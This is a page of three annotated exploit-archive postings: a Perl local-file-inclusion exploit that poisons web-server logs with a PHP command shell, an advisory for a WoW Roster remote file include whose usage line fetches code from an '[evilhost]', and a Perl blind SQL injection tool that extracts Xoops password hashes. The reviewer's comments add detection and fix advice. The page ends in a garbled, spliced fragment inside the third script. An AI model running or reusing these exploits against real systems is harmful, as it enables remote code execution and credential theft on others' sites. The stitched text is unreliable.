# NOTE(review): this page holds three separate exploit-archive postings whose
# line breaks were lost. The first posting starts, and the last one ends,
# outside this excerpt. Those cut fragments are left untouched.

# --- Posting 1 (tail): local file inclusion combined with log poisoning ---
# The statements below sit inside a loop whose header is not visible here.
# Presumably it walks a list of candidate log-file paths in $path (confirm
# against the full listing).
#
# Each pass asks include/WBmap.php to include $path through its `l` parameter,
# with a URL-encoded NUL byte (%00) appended. The PHP side is not shown, so
# presumably the NUL cuts off a suffix the script adds (to be confirmed).
# PHP 5.3.4 and later reject paths that contain a NUL byte.
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting \r\n";
print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n";
print $sock "Host: $target\n";
# The User-Agent claims to be Googlebot, so filtering on the header alone would
# not single these requests out. Checking the client address against the
# crawler's published ranges would.
print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $sock "Accept: text/html\n";
print $sock "Connection: close\n\n\r\n";
#locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253
# Read the whole response into $out.
$out = "";
while ($answer = <$sock>) { $out.=$answer; }
close($sock);
# A pair of `_exppl_` markers in the response is taken as proof that $path was
# included. The markers must have been planted by an earlier request that is
# not part of this excerpt. The same string in an access log is a detection signal.
if ($out =~ m/_exppl_(.*?)_exppl_/ms) { print "[+] Log file found! [".$path."] \n"; $log = $path; }
}
# Stop if no candidate path returned the marker.
if ($log eq "") { print "[-] Log file not found. Exiting \n"; exit(); }
print "[+] Inserting PHP Shell into logs\n";
# $code is PHP source that calls the function named in $cmdfunct (set outside
# this excerpt) on the `cmd` query parameter. It is sent as the request path,
# so the web server writes it into its access log.
# Defender view:
#  - request lines containing `<?php`, and `l=` values that end in %00 or name
#    a log file, are the signals visible in this code;
#  - the include target in WBmap.php should come from a fixed allow-list, not
#    from a request parameter;
#  - server logs should not be readable by the PHP process.
$code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting \r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
# The response on $xpl is never read and the socket is not closed explicitly.
print "[+] Sent code \n";
# The final message points back at the same `l=` include, now using $log.
# The line break inside the string literal below is kept exactly as found on the page.
print "[!] 
Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00";

# milw0rm.com [2006-12-01]

# --- Posting 2: advisory text, not Perl ---
# It describes a remote file include through the `subdir` parameter of
# lib/phpbb.php. Defender view: keep PHP's allow_url_include (and, where
# possible, allow_url_fopen) off, and never build an include path from a
# request parameter. A `subdir=` value that carries a URL is the signal to
# look for in logs.
Black_hat_cr(HCE) WoW Roster <= 1.70 (/lib/phpbb.php) Remote File Include Vulnerability
Code:
Title : WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability
Affected software description :
Application : World of Warcraft (WoW) Roster
URL : http://www.wowroster.net/
dork : "wow roster version 1.*"
Exploit :
Usage: http://[target]/[roster_path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd= ls
greets: XLR, rdy, wiggle, phreek, menx
[ ]
special greet: my old gf ;)
Contact:
Nick: |peti on irc.quakenet.org/irc.efnet.net
[ eof ]
# milw0rm.com [2006-08-02]

# --- Posting 3: boolean-based blind SQL injection against xmlrpc.php ---
# The script recovers a stored password hash one character at a time by
# asking true/false questions through check(). The body of check() is cut off
# at the end of this excerpt, so the request it sends is not visible.
# Defender view:
#  - each comparison costs one request, so a run produces a burst of
#    near-identical requests to the URL given with -u (xmlrpc.php in the
#    header example);
#  - the fragments built here contain `/**/BETWEEN/**/` and `/**/AND/**/`,
#    which can be matched in request logs;
#  - the fix belongs in the server code: bind the value as a query parameter,
#    and run a release newer than the affected range named in the header.
vns3curity(HCE) x00ps Portal - Exploit Xoops <= 2.0.11 xmlrpc.php SQL Injection Exploit
Code:
#!/usr/bin/perl
## Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC
## based on http://www.gulftech.org/?node=research&article_id=00086-06292005
## coded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
## example:
## r57xoops.pl -u http://www.xoops2.ru/xmlrpc.php -n Alexxus
##
## Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC
##
## [~] URL : http://www.xoops2.ru/xmlrpc.php
## [~] NAME : Alexxus
## [~] SEARCHING PASSWORD [ DONE ]
##
## USER NAME : Alexxus
## USER HASH : a26c7baaa40ab863f9b22c8649427fa6
##
use LWP::UserAgent;
use Getopt::Std;

# getopts() stores the -u and -n values in the package globals $opt_u and $opt_n.
getopts('u:n:');
$url = $opt_u;
$name = $opt_n;
# usage() is defined outside this excerpt.
if(!$url || !$name) { &usage; }

# $s_num starts at 1 and grows by one per recovered character. Presumably it is
# the character position that check() puts into its query (to be confirmed,
# since check() is cut off below).
$s_num = 1;
# Unbuffer STDOUT.
$|++;
# $n is incremented once per check() call.
$n = 0;
# head() is defined outside this excerpt.
&head;
print "\r\n";
print " [~] URL : $url\r\n";
print " [~] NAME : $name\r\n";
print " [~] SEARCHING PASSWORD [|]";

# Main loop: one character code per iteration.
# crack() tests the codes from its lower bound up to, but not including, its
# upper bound. The two ranges therefore cover codes 47..57 and 96..102: the
# digits 0-9 and the letters a-f, plus one code below each. That matches a
# lowercase hex digest like the one in the header example.
while(1)
{
    # Try the second range only when the first one yields 0 (no match).
    if(&found(47,58)==0) { &found(96,103); }
    # The result is read from the global $i, which found() and crack() set.
    $char = $i;
    # A code of 0 means neither range matched. That is treated as end of string.
    if ($char=="0")
    {
        if(length($allchar) > 0){
            print qq{\b\b DONE ] USER NAME : $name USER HASH : $allchar };
        }
        else { print "\b\b FAILED ]"; }
        exit();
    }
    else { $allchar .= chr($char); }
    $s_num++;
}

# found($fmin, $fmax): narrow the range [$fmin, $fmax] by halving.
# A range narrower than 5 is handed to crack() for a linear scan. Otherwise the
# midpoint $r is computed and check() is asked whether the value lies between
# $r and $fmax; the search then recurses into the matching half.
# The result is left in the global $i.
# The ($$) prototype has no effect on the &-prefixed calls used in this file.
sub found($$)
{
    my $fmin = $_[0];
    my $fmax = $_[1];
    if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
    $r = int($fmax - ($fmax-$fmin)/2);
    # `/**/` is an empty SQL comment standing in for whitespace.
    $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
    if ( &check($check) ) { &found($r,$fmax); }
    else { &found($fmin,$r); }
}

# crack($cmin, $cmax): linear scan of the codes $cmin .. $cmax-1.
# Each code is tested with an `=<code>` fragment passed to check().
# Returns the first code that check() accepts, or 0 when none matches.
# The loop counter is the global $i, so the result is also visible there.
sub crack($$)
{
    my $cmin = $_[0];
    my $cmax = $_[1];
    $i = $cmin;
    while ($i<$cmax)
    {
        $crcheck = "=$i";
        if ( &check($crcheck) ) { return $i; }
        $i++;
    }
    $i = 0;
    return $i;
}

# check($fragment): the visible part bumps the request counter $n, calls
# status() (defined outside this excerpt) and stores the fragment in $ccheck.
# NOTE(review): the rest of check() is missing. The text after `$ccheck = $_[0];`
# is a spliced fragment of the first posting and is kept exactly as found.
sub check($)
{
    $n++;
    status();
    $ccheck = $_[0];
. "Accept: text/html "; print $sock "Connection: close "; #locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253 $out = ""; while